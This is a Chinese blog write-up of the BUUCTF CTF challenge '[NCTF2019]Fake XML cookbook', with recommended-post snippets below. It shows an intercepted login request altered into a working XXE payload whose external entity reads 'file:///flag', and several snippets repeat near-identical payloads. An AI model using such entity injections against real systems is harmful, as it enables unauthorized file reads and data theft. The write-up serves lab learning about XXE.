web buuctf [NCTF2019]Fake XML cookbook1

最新推荐文章于 2023-12-11 09:25:52 发布
最新推荐文章于 2023-12-11 09:25:52 发布
阅读量670 收藏 1
点赞数
文章标签: XXE xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123873595
版权

考点:XXE(XML External Entity Injection 即XML外部实体注入)

1.界面

随便填入信息,进行抓包

2.分析请求头,

有x-requests-with,可以知道请求是ajax请求(ajax 全名 async javascript and XML(异步JavaScript和XML))也就是通过xml进行数据传输

https://xz.aliyun.com/t/6887#toc-0

抓包更改xml

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>123456</password></user>

 

 得到flag

半杯雨水敬过客
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
最新发布
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)
小宇的web博客
02-18 4222
buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题 乍一看像是sql注入,但是题目提示了是xml,这里就不考虑sql注入了。 先抓包看一下 这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入(被各种后端脚本调用) XML=>像html,html的目的是显示数据,但是xml的目的是传输数据,他没有预定义,他是纯文本,他是不会
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
网安小趴菜
09-25 594
BUUCTF Web [NCTF2019]Fake XML cookbook1 & [安洵杯 2019]easy_web1
[NCTF2019]Fake XML cookbook 1
shinygod的博客
03-13 1949
知识点:XML实体注入漏洞(XXE) 原理:XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详细了解 查看源代码,访问doLogin.php 访问doLogin.php,提示加载外部xml实体 DOCTYPE(文档类型定义的声明) ENTITY(实体的声明) SYSTEM、PU
全国大学生电子设计大赛之历年.7z
09-19
全国大学生电子设计大赛历年题——从第一届到第十四届
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
RSA加密软件 (VC++,MFC程序实现)
05-27
RSA加密程序实现VC++ ,MFC 可以产生任意位数的大数素,可以作为毕业论文哈。也是学习RSA加密的好例子,可以学到很多的加密函数和加密算法,很多算法是很经典的 ,比如欧拉定理,费马定理,还有中国剩余定理等.........
buuctf-Fake XML cookbook
m0_62094846的博客
04-06 295
抓包后看它的传参格式有点像xss,但是尝试过没有回显,看别人的wp,是xxe,也是和html有关 直接粘贴别人的payload,然后分析学习下 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY c SYSTEM "file:///flag"> ]> <user><username>&c;</username><passwor...
BUUCTF [NCTF2019] Fake XML cookbook
Senimo
01-03 768
[NCTF2019]Fake XML cookbook 考点: 启动环境: 由题目提示,猜测为XXE漏洞。 首先尝试登陆: 使用BurpSuite抓取数据包: 看到了其中的XML代码: <user><username>admin</username><password>admin</password></user> 查看网页源码: <script type='text/javascript'> function d
BUUCTF:[NCTF2019]Fake XML cookbook
qq_46230755的博客
12-18 499
说在前面 这题的考点是XXE攻击 https://xz.aliyun.com/t/6887 这里很详细讲了什么是XXE 打开来后的页面是这样的,我们试着用admin和123456进行输入,然后抓个包 里面存在一个XML实体,我们可以构造恶意实体,读取flag <!DOCTYPE ANY [ <!ENTITY test SYSTEM "file:///flag"> ]> <user><username>&test;</username.
[NCTF2019]Fake XML cookbook
weixin_55710577的博客
06-23 1689
[NCTF2019]Fake XML cookbook
BUUCTF】[NCTF2019]Fake XML cookbook
aoao331198的博客
04-30 293
bp抓包观察,username和password是以xml文件形式post的 学习从XML相关一步一步到XXE漏洞 用最基本的XXE攻击 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a [ <!ENTITY user SYSTEM "file:///flag"> ]> <user><username>&user;</username><password>123&
[NCTF2019]Fake XML cookbook1
whale_waves的博客
12-11 719
xml注入其实和sql注入类似,利用了xml的解析机制如果系统没有将‘’进行转义,那么攻击者就可以修改或者添加xml信息 例如: 这里是正常的注册的xml 用户输入 假如我添加一个呢,这样是否就将我们输入的用户名变成了权限 用户输入
BUUCTF Fake XML cookbook
wwwwyyyrre的博客
04-08 207
打开题目发现有账号密码登录 先尝试万能密码 但是发现不行 回到题目有xml 去搜索一下发现xml有注入漏洞XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load 默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。XXE原理。
[NCTF2019]SQLi
07-28
- *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值